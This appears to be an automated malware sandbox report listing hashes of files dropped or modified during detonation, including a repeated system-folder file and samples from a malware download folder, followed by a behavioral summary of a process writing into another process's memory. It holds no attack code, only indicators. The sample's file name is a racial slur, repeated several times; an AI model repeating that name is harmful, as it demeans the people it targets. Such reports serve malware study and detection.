| SHA256 | 3eaab030d5175e257dcc2d963018c0a08b51d8c10633acdf9a2aa594615aa893 |
| SHA512 | e51b9ee66ee373802e40d98d0a980383f5ffe404be1948d262e06aff5de249db6602fa35a0b7c3d01ed285e97e00a1777a692feb1b077d344ebc01dcd52f67f4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe
| MD5 | ea257066a195cc1bc1ea398e239006b2 |
| SHA1 | fce1cd214c17cf3a56233299bf8808a46b639ae1 |
| SHA256 | 81e95eaca372c94265746b08aac50120c45e6baae7c521a8a23dd0dfdc3b9410 |
| SHA512 | 57c01e41e30259632ffbe35a7c07cc8b81524ca26320605750a418e0e75f229d2704ae226106147d727fe6330bc5268f7a2a9838fa2e7b0178eadf056682a12f |
C:\Windows\directx.sys
| MD5 | d827ab5ce62fa1a13599e44c2b5eb68c |
| SHA1 | eb1b2eef98d326bb819789bdb6bb61d150b0838d |
| SHA256 | 3b35dacf3f18db408eedb34a19de355aba0057b9e541bd47e1cc8922468d861d |
| SHA512 | c70fa32ca445d4ef38d8b31f2f028dfaf7c423e1101917c0646ec0515bc5fe250e25218165b658588984b5fae7cb873d880739cddd69c2b76a6583d05b1c4dca |
C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe
| MD5 | 45fe36d03ea2a066f6dd061c0f11f829 |
| SHA1 | 6e45a340c41c62cd51c5e6f3b024a73c7ac85f88 |
| SHA256 | 832640671878e0d9a061d97288ffaae303ba3b4858ed5d675c2170e7770ec8a6 |
| SHA512 | c8676bd022fae62a2c03932dd874da8482168698fc99987c8d724b5302f75131839b5b3b6f8288b823c5bb732918f6bc49c377116bb78825807de45b6a10026f |
C:\Windows\directx.sys
| MD5 | 1b96c1917e08eecf75efb96ff8b32aa6 |
| SHA1 | f0b531b22bd2062fce3c929c6a56c59bcb3fd0a8 |
| SHA256 | 4ea936a86f4bfb1564d3b0c4c138c00cf9871dd1605278c3a5a2cc20d2cdbe3b |
| SHA512 | be6cf664bf7254a760d1eae8fab20a61a1342122a1ab861b20a68c3a1814e861e35b9d3ac76bd0ae6a6b19721df4987eee2b636a084f5f9a38f46cd872b2ed12 |
C:\Windows\directx.sys
| MD5 | 11a2c8e8eee73c8292af4c68c87d3f95 |
| SHA1 | bfe972e24fc5084e4118a1ab77288c06139e3d76 |
| SHA256 | 4f9265944e086641d540c2e7ef4c263ec58373801f607d8c995d1e1a4393ddb6 |
| SHA512 | 69d5e639c61c383eccd21880ae191099fc993bcd5faee05595ad0553ef995d8b813ba296c4fe4e14f55501fcf4a9868c8c7a33ef0529fdcb7fe75a99dec7512c |
C:\Windows\directx.sys
| MD5 | afc2d2378b42846f16157d8eca5e7792 |
| SHA1 | 2b46cb980c2a731f7190e2d6354fc9b26b396ed5 |
| SHA256 | d72d95dac3332bcb7a184faed3bec309027001c85c38e6d9199447c0fbbd6887 |
| SHA512 | 1810507b400025fb2232a714c16ef60fdab97c25937f38523ac16f1a7db6a32e4e44a8a94d758f1e025a156970d3503183b98b93cba3c27817411ffd0fda0998 |
C:\Users\Admin\Downloads\UrlHausFiles\file.exe
| MD5 | f7f61ffb8e1f1e272bdf4d326086e760 |
| SHA1 | 452117f31370a5585d8615fc42bc31fdbe32a348 |
| SHA256 | e98ae7f96f7cee07ef93b3c98ccae81c66b29e4ede046112e200bf7c152fa9af |
| SHA512 | 158fe3a916f761d766acb75da048b6e224a18d8aadde24af238e6c94be117ff2639463cb4b78c8642a3980d1b9e130741023a848853bca135e8f1fcba481305f |
C:\Windows\directx.sys
| MD5 | 71c53284102c537be6cfce6ae7651ee7 |
| SHA1 | 7fafbff525c79fe71b5d973fc02ef632b73e1d6c |
| SHA256 | 945128d038b443ef9ffb54e345303960c006839b522de30e9672c616b6ad02cc |
| SHA512 | 4011a598e57ba7855be70bc714055a66f2995ce853e31833dca3c3256d8cf84b88cd8719dfba2ecbef8902401264c39f531a2b09e1d482ee5fb390361352e614 |
C:\Windows\directx.sys
| MD5 | 1e96152ca7879c668814acc782c6b7d3 |
| SHA1 | 40b27bfe1916a118377de4c75eff3e1b17235227 |
| SHA256 | b8e242ebf7e5a859f51a36891e8b5205f0b8e24b3a81fcdd347fb9e990022583 |
| SHA512 | fac30b63ed52083c17a3c0cb72c068bb4f11c9495c394b65055eb2bdac2709afc863459bab7aafbb0a9f4c603b4b67da81d03bdd4a487bfdc2490d1c19c9df10 |
C:\Windows\directx.sys
| MD5 | fde174c194bf224ecfe20795a81699d0 |
| SHA1 | 806b0aa1c12ef8df269ca9b9a7e68764e2c93c5a |
| SHA256 | f0429b79c4a9fe6345cfef9f1219cd01d306a59204a0cfaa91d168dbe91b804c |
| SHA512 | fcd33cca95b14d0e7380b91fa70b087a9538f8cbc2dd1079bee98bb0b01658dd19637a1cb1055963ca91f0fd5efe2e0fddbdda2124a20af8e75ceeb5559ff962 |
C:\Users\Admin\Downloads\UrlHausFiles\ipscan.exe
| MD5 | 6c1bcf0b1297689c8c4c12cc70996a75 |
| SHA1 | 9d99a2446aa54f00af0b049f54afa52617a6a473 |
| SHA256 | 40dc213fe4551740e12cac575a9880753a9dacd510533f31bd7f635e743a7605 |
| SHA512 | 7edf53adf8db463658aa4a966cf9e22bf28583cb0ca4317af19e90d85232b6cb627e810033155383948d36ad6a1a14f32b3381d10c7cd6c4bd0482c974c129db |
C:\Windows\directx.sys
| MD5 | c73628947e54e0f324e1139e11a3a5d9 |
| SHA1 | 30bf3de09ceecb2f4ee2bd16079ca10b0d58248b |
| SHA256 | 4e03e371e1cbb5cac32c440af90b54d5d82f0998e8d33fb64959e8fb3252f27c |
| SHA512 | 8d6985d5e28a2abe8c64a53fdd66b7517dedcdc077aee48fc5fb1991ffe04a205754a9df7956351e933446c124d5c647f834d75185c221d11528e625f94d848f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\a2f3c859-93c3-4baa-9f22-bd5f5b6244b7.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a492189da88fa2e46fff2f204c7b60ac |
| SHA1 | f4c43854809d78e9e36400de22702e2e06cdef29 |
| SHA256 | e171ebf6b6df011253ccff0fb9edd57cccf408388426fe5aac4967f8cfd0d330 |
| SHA512 | 278cadda6403e483c177827a4229fed6354d03a68ebd3dbc494704f1b993440594f5ba32c39c571fe62b338885ada24c305eabd09c5cf0d4918c105cfa080ed7 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
C:\Windows\directx.sys
| MD5 | c052df275d34357e8a69f1ef2990d16d |
| SHA1 | a4cb4b778dc7d829a8a49f9e574fe18864bc6a3d |
| SHA256 | 7026130a1809b971c95d899ef48a50998f27b4045a18897de16efc5b1c701ca9 |
| SHA512 | 659e779d984168d1c1bc5b9cdaf6ec04fc664767126a943100a84a3594ae9ff5164206c3c8fff84fb3d8c87387036c1f705dd6a740174ecfdbf254de53daa01c |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-04 13:02
Reported
2024-12-04 13:05
Platform
win7-20240903-en
Max time kernel
122s
Max time network
126s
Command Line
Signatures
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\niggers.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1752 wrote to memory of 2952 | N/A | C:\Users\Admin\AppData\Local\Temp\niggers.exe | C:\Users\Admin\AppData\Local\Temp\niggers.exe |
| PID 1752 wrote to memory of 2952 | N/A | C:\Users\Admin\AppData\Local\Temp\niggers.exe | C:\Users\Admin\AppData\Local\Temp\niggers.exe |
| PID 1752 wrote to memory of 2952 | N/A | C:\Users\Admin\AppData\Local\Temp\niggers.exe | C:\Users\Admin\AppData\Local\Temp\niggers.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\niggers.exe
"C:\Users\Admin\AppData\Local\Temp\niggers.exe"
C:\Users\Admin\AppData\Local\Temp\niggers.exe
"C:\Users\Admin\AppData\Local\Temp\niggers.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\_MEI17522\python311.dll
| MD5 | 9a24c8c35e4ac4b1597124c1dcbebe0f |
| SHA1 | f59782a4923a30118b97e01a7f8db69b92d8382a |
| SHA256 | a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7 |
| SHA512 | 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b |